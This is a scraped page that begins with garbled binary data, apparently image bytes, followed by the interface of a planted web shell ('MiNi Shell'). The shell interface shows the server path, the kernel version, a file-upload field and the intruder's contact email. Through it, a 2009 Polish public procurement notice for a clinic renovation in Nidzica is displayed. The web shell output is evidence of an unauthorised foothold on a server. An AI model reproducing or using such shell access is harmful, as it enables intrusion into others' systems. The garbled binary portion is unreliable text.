JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090326/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090326/77856-N-2009.html

<p class="kh_header"><b>Nidzica: Remont Budynku Przychodni Rejonowej przy ul. Traugutta 13 w Nidzicy
Zespołu Opieki Zdrowotnej w Nidzicy</b><br>
<b>Numer ogłoszenia: 77856 - 2009; data zamieszczenia: 26.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Opieki Zdrowotnej , ul. Mickiewicza 23, 13-100 Nidzica, woj. warmińsko-mazurskie, tel. 089 625 05 00, faks 089 625 05 59.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.zoz.nidzica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont Budynku Przychodni Rejonowej przy ul. Traugutta 13 w Nidzicy
Zespołu Opieki Zdrowotnej w Nidzicy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres robót wynika z: projektu architektoniczno-budowlanego, przedmiarów robót 
 oraz specyfikacji technicznych wykonania i odbioru robót oraz pozostałych
 załączonych informacji do n/n SIWZ. i podzielony jest na  dwa etapy.
 I etap to wykonanie następujących prac:
      a)  wykonanie pokrycia dachu , oraz obróbek  blacharskich,
      b)  wykonanie i wymiana stolarki budowlanej zgodnie z projektem,
      c)  wykonanie izolacji poziomej i pionowej fundamentów w budynku Przychodni,
      d)  przegląd, naprawa  i regulacja instalacji co w budynku Przychodni,
      e)  uzupełnienie instalacji wód opadowych,
 II etap to wykonanie następujących prac:
      a)  naprawa istniejącego parkingu i  wykonanie nowych miejsc parkingowych na
           zapleczu przychodni,
      b)  docieplenie stropu wentylowanego zgodnie z projektem.
 Realizacja drugiego etapu remontu przewidywane jest jako zamówienie 
 uzupełniające (art.67 ust. 1 pkt 6 pzp) i  nastąpi z chwilą zabezpieczenia środków 
 finansowych na jego wykonanie, nie później jednak niż do 31.10.2010 roku..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.26.00.00-7, 45.26.14.10-1, 45.26.23.00-4, 45.32.00.00-6, 45.32.10.00-3, 45.33.11.00-7, 45.33.23.00-6, 45.42.10.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający  żąda od wykonawców wniesienia wadium w wysokości 5000,00
złotych słownie: pięć tysięcy złotych,  zgodnie z art.45 ust. 1, 3, 4, i 6 pkt. 1 - 8.  Ustawy prawo zamówień publicznych<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia ubiegać się mogą Wykonawcy składający ważną i
    odpowiednią ofertę wg wzoru załącznika nr 1 oraz: 
    a) posiadają uprawnienia do wykonywania określonej działalności lub czynności,
    jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, 
    b)  posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem
    technicznym, i osobami zdolnymi do wykonania zamówienia, lub przedstawią 
    pisemne zobowiązanie innych podmiotów do udostępnienia potencjału 
    technicznego i osób zdolnych do wykonania zamówienia
    c)  znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie
     zamówienia:
     posiadają obroty średnioroczne w wykonaniu robót budowlanych w okresie
     ostatnich 3 lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia
     działalności jest krótszy - w tym okresie, w wysokości minimum 1.200.000,-zł; 
     dysponują środkami finansowymi lub zdolnością kredytową, w wysokości łącznej
     co najmniej 150.000,- zł (sto pięćdziesiąt tysięcy złotych); 
     są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej
     działalności na kwotę min.: 250 000,00 zł. 
     d)  nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na 
     podstawie art. 24  i Art 24a PZP,  i spełniają warunki określone w art. 22 PZP
     e)  zatrudniali (średniorocznie) w okresie ostatnich 3 lat przed dniem wszczęcia
     postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym 
     okresie, minimum 10 pracowników na podstawie umowy o pracę; 
     f) wykonali roboty budowlane w okresie ostatnich 5 lat przed dniem wszczęcia
     postępowania, a jeżeli okres prowadzenia działalności jest krótszy- w tym 
     okresie,odpowiadające swoim rodzajem i wartością robotom budowlanym 
     stanowiącym przedmiot zamówienia, t.j. polegające na remontach 
     ogólnobudowlanych minimum 3 obiektów i uzyskali od poprzednich 
     Zamawiających potwierdzenia (np. referencje) że zadania te zostały wykonane 
     należycie..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 i 24a ustawy z dnia 29 stycznia 2004r. - Prawo zamówień publicznych, wykonawca składa następujące dokumenty:
1.   Wykonawca mający swoją siedzibę lub miejsce zamieszkania na terenie
      Rzeczpospolitej Polskiej: składa oświadczenie o spełnianiu warunków udziału 
      w postępowaniu i niepodleganiu wykluczeniu zgodnie z art. 22 ust.1 i  art. 24 
      ust. 1 i 2 i art. 24a ustawy Prawo zamówień publicznych potwierdzone 
      dokumentami;
a)   Aktualne odpisy z właściwego rejestru albo aktualne zaświadczenie o wpisie do
      ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do
      rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie
      wcześniej niż 6 miesięcy przed upływem terminu składania  ofert (§ 1 ust. 1
      pkt 2 rozporządzenia Prezesa Rady Ministrów z dnia 19.5.2006 roku w sprawie
      rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz 
      form, w jakich te dokumenty mogą być składane (Dz. U. z 24.5.2006 r. Nr 87, 
      Poz. 605 ze zmianami z dnia 16 października 2008 r Dz.U. Nr 188, poz. 1155). 
b)   aktualną  informację z Krajowego Rejestru Karnego w zakresie określonym w 
      art. 24 ust. 1 pkt 4-8 ustawy pzp (w punkcie w jakim dotyczy danego 
      Wykonawcy ze względu na formę organizacyjną jaką przyjmie w obrocie 
      gospodarczym)wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu 
      składania ofert. (§ 1 ust. 1 pkt 4 rozporządzenia Prezesa Rady Ministrów z dnia 
      19.5.2006 roku w sprawie rodzajów dokumentów, jakich może żądać 
      Zamawiający od Wykonawcy  oraz form, w jakich te dokumenty mogą byc 
      składane (Dz. U. z 24.5.2006 r. Nr 87, Poz. 605 ze zmianami z dnia 16 
      października 2008 r Dz.U. Nr 188,  poz. 1155). 
c)   aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz  
      właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego 
      Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca 
      nie  zalega z opłaceniem podatków, opłat oraz składek na ubezpieczenie 
      zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem 
      zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub 
      wstrzymanie w całości wykonania decyzji właściwego organu wystawionych 
      nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. (§ 1 ust. 1 
      pkt 3 rozporządzenia Prezesa Rady Ministrów z dnia 19.5.2006 roku w sprawie 
      rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy
      oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 24.5.2006 r.
      Nr 87, poz. 605 ze zmianami z dnia 16 października 2008 r Dz.U. Nr 188, 
      poz. 1155).     
2.   Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium
      Rzeczpospolitej  Polskiej, zamiast dokumentów, o których mowa w pkt a i c 
      składa: 
a)   dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub 
      miejsce zamieszkania, potwierdzające odpowiednio, ze: 
       - nie otwarto jego likwidacji ani nie ogłoszono upadłości, 
       - nie orzeczono wobec niego zakazu ubiegania się o zamówienie, 
       - składa zaświadczenie właściwego organu sądowego lub administracyjnego  
          kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą,
          w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy pzp (w punkcie w 
          jakim dotyczy danego Wykonawcy ze względu na formę organizacyjną jaką 
          przyjmie w obrocie gospodarczym). Dokumenty, o których mowa powinny 
          być wystawione nie wcześniej niż 6 miesięcy przed upływem  terminu
          składania ofert.
        b)   Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma
           siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których 
           mowa wyżej, zastępuje się je dokumentem zawierającym oświadczenie 
           złożone przed notariuszem, właściwym organem sądowym,   
           administracyjnym albo organem samorządu zawodowego lub gospodarczego
           odpowiednio, kraju pochodzenia osoby lub kraju, w którym Wykonawca ma
           siedzibę lub adres  zamieszkania. 
3.    polisę lub inny dokument potwierdzający, że wykonawca jest ubezpieczony od
       odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.
4.    Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub 
       kserokopii potwierdzonych  za zgodność przez osobę osoby uprawnioną do 
       podpisania oferty z dopiskiem za zgodność z oryginałem..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www. zoz.nidzica.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www. zoz.nidzica.pl.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.04.2009 godzina 12:00, miejsce: Oferty należy składać w siedzibie Zamawiającego, w sekretariacie Zespołu Opieki
Zdrowotnej przy ul. Mickiewicza 23 w Nidzicy.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com